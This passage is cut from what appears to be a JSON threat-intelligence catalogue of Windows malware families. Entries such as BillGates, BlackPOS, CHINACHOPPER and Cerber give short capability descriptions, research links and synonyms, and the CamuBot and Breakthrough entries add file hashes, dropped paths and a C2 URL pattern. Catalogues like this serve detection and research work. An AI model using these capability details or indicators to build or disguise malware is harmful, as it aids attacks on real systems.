files\r\nExecute shell commands\r\nUninstall itself", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bezigate", "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf" ], "synonyms": [], "type": [] }, "uuid": "29f45180-cb57-4655-8812-eb814c2a0b0e", "value": "Bezigate" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bfbot" ], "synonyms": [], "type": [] }, "uuid": "95b454f6-8ffb-4ef7-8a91-14d48601a899", "value": "BfBot" }, { "description": "BillGates is a modularized malware, of supposedly Chinese origin. Its main functionality is to perform DDoS attacks, with support for DNS amplification. Often, BillGates is delivered with one or many backdoor modules.\r\n\r\nBillGates is available for *nix-based systems as well as for Windows.\r\n\r\nOn Windows, the (Bill)Gates installer typically contains the various modules as linked resources.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.billgates", "https://securelist.com/versatile-ddos-trojan-for-linux/64361/", "https://habrahabr.ru/post/213973/", "https://www.akamai.com/kr/ko/multimedia/documents/state-of-the-internet/bill-gates-botnet-threat-advisory.pdf" ], "synonyms": [], "type": [] }, "uuid": "42ed9fc4-08ba-4c1c-bf15-d789ee4e3ca6", "value": "BillGates" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.biodata", "https://unit42.paloaltonetworks.com/unit42-recent-inpage-exploits-lead-multiple-malware-families/", "https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/" ], "synonyms": [], "type": [] }, "uuid": "96bcaa83-998b-4fb2-a4e7-a2d33c6427d7", "value": "BioData" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.biscuit", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [ "zxdosml" ], "type": [] }, "uuid": "f98b4092-5f32-407c-9015-2da787d70c64", "value": "Biscuit" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bitsran", "http://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html" ], "synonyms": [], "type": [] }, "uuid": "3e072464-6fa6-4977-9b64-08f86d1062fc", "value": "Bitsran" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bitter_rat", "https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/", "https://www.forcepoint.com/blog/security-labs/bitter-targeted-attack-against-pakistan" ], "synonyms": [], "type": [] }, "uuid": "265f96d1-fdd4-4dec-b7ca-51ae6f726634", "value": "Bitter RAT" }, { "description": "BKA Trojaner is a screenlocker ransomware that was active in 2011, displaying a police-themed message in German language.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bka_trojaner", "https://www.evild3ad.com/405/bka-trojaner-ransomware/" ], "synonyms": [ "bwin3_bka" ], "type": [] }, "uuid": "ea06f87c-148c-49e5-afec-7012cb2b4f0a", "value": "BKA Trojaner" }, { "description": "a backdoor that obfuscates its communications as normal traffic to legitimate websites such as Github and Microsoft's Technet portal.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackcoffee", "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", "https://attack.mitre.org/software/S0069/", "https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf", "http://malware-log.hatenablog.com/entry/2015/05/18/000000_1" ], "synonyms": [], "type": [] }, "uuid": "ff660bf2-a9e4-4973-be0c-9f6618e40899", "value": "BLACKCOFFEE" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackenergy", "https://securelist.com/blackenergy-apt-attacks-in-ukraine-employ-spearphishing-with-word-documents/73440/", "https://securelist.com/be2-extraordinary-plugins-siemens-targeting-dev-fails/68838/", "https://marcusedmondson.com/2019/01/18/black-energy-analysis/", "https://securelist.com/be2-custom-plugins-router-abuse-and-target-profiles/67353/" ], "synonyms": [], "type": [] }, "uuid": "82c644ab-550a-4a83-9b35-d545f4719069", "value": "BlackEnergy" }, { "description": "BlackPOS infects computers running on Windows that have credit card readers connected to them and are part of a POS system. POS system computers can be easily infected if they do not have the most up to date operating systems and antivirus programs to prevent security breaches or if the computer database systems have weak administration login credentials. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackpos", "https://blog.trendmicro.com/trendlabs-security-intelligence/new-blackpos-malware-emerges-in-the-wild-targets-retail-accounts/" ], "synonyms": [ "Kaptoxa", "POSWDS", "Reedum" ], "type": [] }, "uuid": "1e62fc1f-daa7-416f-9159-099798bb862c", "value": "BlackPOS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackrevolution", "https://www.arbornetworks.com/blog/asert/the-revolution-will-be-written-in-delphi/" ], "synonyms": [], "type": [] }, "uuid": "6a5bd819-5fbc-437b-92c4-ce0dfb5c67f8", "value": "BlackRevolution" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackrouter", "https://www.bleepingcomputer.com/news/security/blackrouter-ransomware-promoted-as-a-raas-by-iranian-developer/", "https://blog.trendmicro.com/trendlabs-security-intelligence/legitimate-application-anydesk-bundled-with-new-ransomware-variant/" ], "synonyms": [ "BLACKHEART" ], "type": [] }, "uuid": "0b235fbf-c191-47c0-ae83-9386a64b1c79", "value": "BlackRouter" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackshades", "https://blog.malwarebytes.com/threat-analysis/2014/05/taking-off-the-blackshades/", "https://blog.malwarebytes.com/threat-analysis/2012/06/blackshades-in-syria/", "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html", "https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-2-blackshades-net/" ], "synonyms": [], "type": [] }, "uuid": "0fb57d46-1c4f-49a3-80c2-05bcaa34ec1b", "value": "BlackShades" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.boaxxe", "https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/" ], "synonyms": [], "type": [] }, "uuid": "2f11eb73-4faa-48c5-b217-11e139962c6f", "value": "Boaxxe" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bohmini" ], "synonyms": [], "type": [] }, "uuid": "444ca9d1-7128-40fa-9665-654194dfbe0b", "value": "Bohmini" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bolek", "https://asert.arbornetworks.com/communications-bolek-trojan/", "http://www.cert.pl/news/11379" ], "synonyms": [ "KBOT" ], "type": [] }, "uuid": "d3af810f-e657-409c-b821-4b1cf727ad18", "value": "Bolek" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bouncer", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "80487bca-7629-4cb2-bf5b-993d5568b699", "value": "Bouncer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bozok", "https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html", "https://unit42.paloaltonetworks.com/unit42-projectm-link-found-between-pakistani-actor-and-operation-transparent-tribe" ], "synonyms": [], "type": [] }, "uuid": "f9d0e934-879c-4668-b959-6bf7bdc96f5d", "value": "Bozok" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.brain", "https://www.welivesecurity.com/2017/01/18/flashback-wednesday-pakistani-brain/" ], "synonyms": [], "type": [] }, "uuid": "1619ee64-fc54-47c0-8ee1-8b786fefc0fd", "value": "BRAIN" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.brambul", "https://www.us-cert.gov/ncas/alerts/TA18-149A", "https://www.us-cert.gov/ncas/analysis-reports/AR18-149A", "https://www.acalvio.com/lateral-movement-technique-employed-by-hidden-cobra/" ], "synonyms": [], "type": [] }, "uuid": "d97ae60e-612a-4feb-908a-8c4d32e9d763", "value": "Brambul" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bravonc", "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group" ], "synonyms": [], "type": [] }, "uuid": "fbed27da-551d-4793-ba7e-128256326909", "value": "BravoNC" }, { "description": "This is a backdoor which FireEye call the Breach Remote Administration Tool (BreachRAT), written in C++. The malware name is derived from the hardcoded PDB path found in the RAT: C:\\Work\\Breach Remote Administration Tool\\Release\\Client.pdb", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.breach_rat", "https://www.fireeye.com/blog/threat-research/2016/06/apt_group_sends_spea.html" ], "synonyms": [], "type": [] }, "uuid": "52cf2986-89e8-463d-90b6-e4356c9777e7", "value": "BreachRAT" }, { "description": "There is no reference available for this family and all known samples have version 1.0.0.\r\n\r\nPdb-strings in the samples suggest that this is an \"exclusive\" loader, known as \"breakthrough\" (maybe), e.g. C:\\Users\\Exclusiv\\Desktop\\хп-пробив\\Release\\build.pdb\r\n\r\nThe communication url parameters are pretty unique in this combination:\r\ngate.php?hwid=&os=&build=1.0.0&cpu=8\r\n\r\n is one of:\r\nWindows95\r\nWindows98\r\nWindowsMe\r\nWindows95family\r\nWindowsNT3\r\nWindowsNT4\r\nWindows2000\r\nWindowsXP\r\nWindowsServer2003\r\nWindowsNTfamily\r\nWindowsVista\r\nWindows7\r\nWindows8\r\nWindows10\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.breakthrough_loader" ], "synonyms": [], "type": [] }, "uuid": "a05b8e4b-a686-439f-8094-037fbcda52bd", "value": "Breakthrough" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bredolab", "https://securelist.com/end-of-the-line-for-the-bredolab-botnet/36335/", "https://www.fireeye.com/blog/threat-research/2010/10/bredolab-its-not-the-size-of-the-dog-in-fight.html" ], "synonyms": [], "type": [] }, "uuid": "55d343a1-7e80-4254-92eb-dfb433b91a90", "value": "Bredolab" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.brushaloader", "https://blog.talosintelligence.com/2019/02/combing-through-brushaloader.html" ], "synonyms": [], "type": [] }, "uuid": "75a03c4f-8a97-4fc0-a69e-b2e73e4564fc", "value": "BrushaLoader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.brutpos", "https://www.fireeye.com/blog/threat-research/2014/07/brutpos-rdp-bruteforcing-botnet-targeting-pos-systems.html" ], "synonyms": [], "type": [] }, "uuid": "e413c33a-badd-49a1-8d44-c9a0983b5151", "value": "BrutPOS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bs2005", "https://github.com/nccgroup/Royal_APT", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/" ], "synonyms": [], "type": [] }, "uuid": "35e00ff0-704e-4e61-b9bb-9ed20a4a008f", "value": "BS2005" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.btcware", "https://www.bleepingcomputer.com/news/security/new-nuclear-btcware-ransomware-released-updated/" ], "synonyms": [], "type": [] }, "uuid": "d29786c6-2cc0-4e2f-97b0-242a1d9e9bf8", "value": "BTCWare" }, { "description": "BUBBLEWRAP is a full-featured backdoor that is set to run when the system boots, and can communicate using HTTP, HTTPS, or a SOCKS proxy. This backdoor collects system information, including the operating system version and hostname, and includes functionality to check, upload, and register plugins that can further enhance its capabilities.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bubblewrap", "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html", "https://attack.mitre.org/software/S0043/" ], "synonyms": [], "type": [] }, "uuid": "d114ee6c-cf7d-408a-8077-d59e736f5a66", "value": "BUBBLEWRAP" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bugat_alreadydump" ], "synonyms": [], "type": [] }, "uuid": "16794655-c0e2-4510-9169-f862df104045", "value": "Bugat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.buhtrap", "https://malware-research.org/carbanak-source-code-leaked/", "https://www.symantec.com/connect/blogs/russian-bank-employees-received-fake-job-offers-targeted-email-attack", "https://www.welivesecurity.com/2015/04/09/operation-buhtrap/", "https://www.group-ib.com/brochures/gib-buhtrap-report.pdf", "https://www.arbornetworks.com/blog/asert/diving-buhtrap-banking-trojan-activity/", "https://blog.dcso.de/pegasus-buhtrap-analysis-of-the-malware-stage-based-on-the-leaked-source-code/" ], "synonyms": [ "Ratopak" ], "type": [] }, "uuid": "fa278536-8293-4717-86b5-8a03aa11063f", "value": "Buhtrap" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bundestrojaner", "http://www.stoned-vienna.com/analysis-of-german-bundestrojaner.html", "https://www.f-secure.com/weblog/archives/00002249.html", "http://www.ccc.de/system/uploads/76/original/staatstrojaner-report23.pdf" ], "synonyms": [ "0zapftis", "R2D2" ], "type": [] }, "uuid": "04aeda9f-7923-45d1-ab74-9dddd8612d47", "value": "Bundestrojaner" }, { "description": "Bunitu is a trojan that exposes infected computers to be used as a proxy for remote clients. It registers itself at startup by providing its address and open ports. Access to Bunitu proxies is available by using criminal VPN services (e.g.VIP72).", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bunitu", "https://malwarebreakdown.com/2018/03/21/fobos-malvertising-campaign-delivers-bunitu-proxy-trojan-via-rig-ek/", "https://zerophagemalware.com/2017/06/07/rig-ek-via-fake-eve-online-website-drops-bunitu/", "http://malware-traffic-analysis.net/2017/05/09/index.html", "https://broadanalysis.com/2019/04/12/rig-exploit-kit-delivers-bunitu-malware/", "https://blog.malwarebytes.com/threat-analysis/2015/07/revisiting-the-bunitu-trojan/", "https://blog.malwarebytes.com/threat-analysis/2015/08/whos-behind-your-proxy-uncovering-bunitus-secrets/" ], "synonyms": [], "type": [] }, "uuid": "4350b52a-8100-49b5-848d-d4a4029e949d", "value": "Bunitu" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.buterat", "http://antivirnews.blogspot.com/2011/01/backdoorwin32-buteratafj.html" ], "synonyms": [ "spyvoltar" ], "type": [] }, "uuid": "cd4ee7f0-394e-4129-a1dc-d5fb423f2311", "value": "Buterat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.buzus", "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Worm:Win32/Yimfoca.A" ], "synonyms": [ "Yimfoca" ], "type": [] }, "uuid": "69a3e0ed-1727-4a9c-ae21-1e32322ede93", "value": "Buzus" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.byeby", "https://researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan" ], "synonyms": [], "type": [] }, "uuid": "12886243-55b6-4864-bf7a-7e2439e3a4c1", "value": "BYEBY" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.c0d0so0" ], "synonyms": [], "type": [] }, "uuid": "b6b187d0-e19f-489a-91c0-7c94519555f6", "value": "c0d0so0" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cabart" ], "synonyms": [], "type": [] }, "uuid": "fe1d51d8-f0e8-4f71-bf5c-724f7d4a824c", "value": "CabArt" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cadelspy", "http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf" ], "synonyms": [ "Cadelle" ], "type": [] }, "uuid": "cad83c5e-2081-4ab4-81c7-32cfc16eae66", "value": "CadelSpy" }, { "description": "There is no lot of IOCs in this article so we take one sample and try to extract some interesting IOCs, our findings below :\r\n\r\nCamuBot sample : 37ca2e37e1dc26d6b66ba041ed653dc8ee43e1db71a705df4546449dd7591479\r\n\r\nDropped Files on disk :\r\n\r\nC:\\Users\\user~1\\AppData\\Local\\Temp\\protecao.exe : 0af612461174eedec813ce670ba35e74a9433361eacb3ceab6d79232a6fe13c1\r\n\r\nC:\\Users\\user~1\\AppData\\Local\\Temp\\Renci.SshNet.dll : 3E3CD9E8D94FC45F811720F5E911B892A17EE00F971E498EAA8B5CAE44A6A8D8\r\n\r\nC:\\ProgramData\\m.msi : AD90D4ADFED0BDCB2E56871B13CC7E857F64C906E2CF3283D30D6CFD24CD2190\r\n\r\nProtecao.exe try to download hxxp://www.usb-over-network.com/usb-over-network-64bit.msi\r\n\r\nA new driver is installed : C:\\Windows\\system32\\drivers\\ftusbload2.sys : 9255E8B64FB278BC5FFE5B8F70D68AF8\r\n\r\nftusbload2.sys set 28 IRP handlers.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.camubot", "https://securityintelligence.com/camubot-new-financial-malware-targets-brazilian-banking-customers/" ], "synonyms": [], "type": [] }, "uuid": "ecac83ab-cd64-4def-979a-40aeeca0400b", "value": "CamuBot" }, { "description": "Cannibal Rat is a python written remote access trojan with 4 versions as of March 2018. The RAT is reported to impact users of a Brazilian public sector management school. The RAT is distributed in a py2exe format, with the python27.dll and the python bytecode stored as a PE resource and the additional libraries zipped in the overlay of the executable.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cannibal_rat", "http://blog.talosintelligence.com/2018/02/cannibalrat-targets-brazil.html" ], "synonyms": [], "type": [] }, "uuid": "1e722d81-085e-4beb-8901-aa27fe502dba", "value": "Cannibal Rat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cannon", "https://www.vkremez.com/2018/11/lets-learn-in-depth-on-sofacy-canon.html", "https://researchcenter.paloaltonetworks.com/2018/11/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/" ], "synonyms": [], "type": [] }, "uuid": "3fada5b6-0b3d-4b83-97c9-2157c959704c", "value": "Cannon" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.carbanak", "https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-one-a-rare-occurrence.html", "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html", "https://www.fox-it.com/en/wp-content/uploads/sites/11/Anunak_APT-against-financial-institutions2.pdf", "https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf" ], "synonyms": [ "Anunak" ], "type": [] }, "uuid": "8c246ec4-eaa5-42c0-b137-29f28cbb6832", "value": "Carbanak" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.carberp" ], "synonyms": [], "type": [] }, "uuid": "8f0d4866-7c67-4376-a6f2-958224d3c9d0", "value": "Carberp" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cardinal_rat", "http://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/?adbsc=social71702736&adbid=855028404965433346&adbpl=tw&adbpr=4487645412", "https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/" ], "synonyms": [], "type": [] }, "uuid": "3d3da4c0-004c-400c-9da6-f83fd35d907e", "value": "Cardinal RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.carrotbat", "https://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/" ], "synonyms": [], "type": [] }, "uuid": "4ad06a5f-12e6-44ae-9547-98ee62114357", "value": "CarrotBat" }, { "description": "ESET describes Casper as a well-developed reconnaissance tool, making extensive efforts to remain unseen on targeted machines. Of particular note are the specific strategies adopted against anti-malware software. Casper was used against Syrian targets in April 2014, which makes it the most recent malware from this group publicly known at this time.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.casper", "https://www.welivesecurity.com/2015/03/05/casper-malware-babar-bunny-another-espionage-cartoon/" ], "synonyms": [], "type": [] }, "uuid": "3198501e-0ff0-43b7-96f0-321b463ab656", "value": "Casper" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.catchamas", "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets" ], "synonyms": [], "type": [] }, "uuid": "8060dbdc-cf31-40bc-9900-eb8119423c50", "value": "Catchamas" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ccleaner_backdoor", "https://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacities", "https://blog.avast.com/additional-information-regarding-the-recent-ccleaner-apt-security-incident", "http://www.intezer.com/evidence-aurora-operation-still-active-part-2-more-ties-uncovered-between-ccleaner-hack-chinese-hackers/", "https://blog.avast.com/avast-threat-labs-analysis-of-ccleaner-incident", "http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html", "http://www.intezer.com/evidence-aurora-operation-still-active-supply-chain-attack-through-ccleaner/", "https://blog.avast.com/progress-on-ccleaner-investigation", "https://www.wired.com/story/ccleaner-malware-targeted-tech-firms", "https://blog.avast.com/update-ccleaner-attackers-entered-via-teamviewer", "https://twitter.com/craiu/status/910148928796061696", "https://www.crowdstrike.com/blog/protecting-software-supply-chain-deep-insights-ccleaner-backdoor/", "http://blog.morphisec.com/morphisec-discovers-ccleaner-backdoor", "https://www.crowdstrike.com/blog/in-depth-analysis-of-the-ccleaner-backdoor-stage-2-dropper-and-its-payload/", "http://blog.talosintelligence.com/2017/09/ccleaner-c2-concern.html" ], "synonyms": [], "type": [] }, "uuid": "c51ee09b-fc2d-41fd-a43b-426a4f337139", "value": "CCleaner Backdoor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.centerpos", "https://www.fireeye.com/blog/threat-research/2016/01/centerpos_an_evolvi.html" ], "synonyms": [ "cerebrus" ], "type": [] }, "uuid": "fca8c5e0-4fef-408c-bcd7-9826271e8e5d", "value": "CenterPOS" }, { "description": "A prolific ransomware which originally added \".cerber\" as a file extension to encrypted files. Has undergone multiple iterations in which the extension has changed. Uses a very readily identifiable set of of UDP activity to checkin and report infections. Primarily uses TOR for payment information.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cerber", "http://blog.trendmicro.com/trendlabs-security-intelligence/cerber-starts-evading-machine-learning/", "https://rinseandrepeatanalysis.blogspot.com/2018/08/reversing-cerber-raas.html", "https://blog.malwarebytes.com/threat-analysis/2016/03/cerber-ransomware-new-but-mature/", "https://www.virusbulletin.com/virusbulletin/2017/12/vb2017-paper-nine-circles-cerber/" ], "synonyms": [], "type": [] }, "uuid": "79a7203a-6ea5-4c39-abd4-faa20cf8821a", "value": "Cerber" }, { "description": "This malware family delivers its artifacts packed with free and generic packers. It writes files to windows temporary folders, downloads additional malware (generally cryptominers) and deletes itself.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cerbu_miner" ], "synonyms": [], "type": [] }, "uuid": "ba7706c1-7d2a-4031-9acc-cb862860da1a", "value": "Cerbu" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chainshot", "https://researchcenter.paloaltonetworks.com/2018/09/unit42-slicing-dicing-cve-2018-5002-payloads-new-chainshot-malware/", "https://www.icebrg.io/blog/adobe-flash-zero-day-targeted-attack" ], "synonyms": [], "type": [] }, "uuid": "36f9a5e0-9a78-4b9a-9072-1596c91b59b6", "value": "Chainshot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chches", "https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html", "https://www.jpcert.or.jp/magazine/acreport-ChChes_ps1.html", "http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/", "https://www.jpcert.or.jp/magazine/acreport-ChChes.html", "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf" ], "synonyms": [ "Ham Backdoor" ], "type": [] }, "uuid": "6eee9bf9-ffce-4c88-a5ad-9d80f6fc727c", "value": "ChChes" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cherry_picker", "https://www.trustwave.com/Resources/SpiderLabs-Blog/Shining-the-Spotlight-on-Cherry-Picker-PoS-Malware/", "https://www.trustwave.com/Resources/SpiderLabs-Blog/New-Memory-Scraping-Technique-in-Cherry-Picker-PoS-Malware/" ], "synonyms": [ "cherry_picker", "cherrypicker", "cherrypickerpos" ], "type": [] }, "uuid": "e6ab90d3-8011-4927-a0cd-eab57e7971aa", "value": "CherryPicker POS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chewbacca", "http://vinsula.com/2014/03/01/chewbacca-tor-based-pos-malware/" ], "synonyms": [], "type": [] }, "uuid": "2137a0ce-8d06-4538-ad0b-6ab6ec865493", "value": "ChewBacca" }, { "description": "a simple code injection webshell that executes Microsoft .NET code within HTTP POST commands. This allows the shell to upload and download files, execute applications with web server account permissions, list directory contents, access Active Directory, access databases, and any other action allowed by the .NET runtime.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chinachopper", "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", "https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html", "https://informationonsecurity.blogspot.com/2012/11/china-chopper-webshell.html", "https://attack.mitre.org/software/S0020/" ], "synonyms": [], "type": [] }, "uuid": "0d8f0bb7-e14f-4b85-baa1-6ec951aa6c53", "value": "CHINACHOPPER" }, { "description": "Adware that shows advertisements using plugin techniques for popular browsers", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chinad" ], "synonyms": [], "type": [] }, "uuid": "098cfb93-8921-48f0-a694-a83f350e8a61", "value": "Chinad" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chir" ], "synonyms": [], "type": [] }, "uuid": "59b5697a-5154-4c08-87f8-c71b0e8425fc", "value": "Chir" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chthonic", "https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan", "https://www.s21sec.com/en/blog/2017/07/androkins/", "https://securelist.com/chthonic-a-new-modification-of-zeus/68176/" ], "synonyms": [ "AndroKINS" ], "type": [] }, "uuid": "9441a589-e23d-402d-9603-5e55e3e33971", "value": "Chthonic" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.citadel", "http://www.xylibox.com/2016/02/citadel-0011-atmos.html", "http://blog.jpcert.or.jp/2016/02/banking-trojan--27d6.html", "https://blog.malwarebytes.com/threat-analysis/2012/11/citadel-a-cyber-criminals-ultimate-weapon/", "https://www.arbornetworks.com/blog/asert/the-citadel-and-gameover-campaigns-of-5cb682c10440b2ebaf9f28c1fe438468/" ], "synonyms": [], "type": [] }, "uuid": "7f550cae-98b7-4a0c-bed2-d79227dc6310", "value": "Citadel" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.client_maximus", "https://securityintelligence.com/client-maximus-new-remote-overlay-malware-highlights-rising-malcode-sophistication-in-brazil/" ], "synonyms": [], "type": [] }, "uuid": "c2bd0771-55d6-4242-986d-4bfd735998ba", "value": "Client Maximus" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cloud_duke", "https://www.f-secure.com/weblog/archives/00002822.html" ], "synonyms": [], "type": [] }, "uuid": "40baac36-2fd0-49b3-b05b-1087d60f4f2c", "value": "Cloud Duke" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cmsbrute", "https://securelist.com/the-shade-encryptor-a-double-threat/72087/" ], "synonyms": [], "type": [] }, "uuid": "ad960c5c-f2a1-405e-a32a-31f75b7c6859", "value": "CMSBrute" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cmstar", "https://twitter.com/ClearskySec/status/963829930776723461", "https://www.votiro.com/single-post/2018/02/13/New-campaign-targeting-Ukrainians-holds-secrets-in-documents-properties", "https://researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan", "https://researchcenter.paloaltonetworks.com/2016/03/digital-quartermaster-scenario-demonstrated-in-attacks-against-the-mongolian-government/" ], "synonyms": [ "meciv" ], "type": [] }, "uuid": 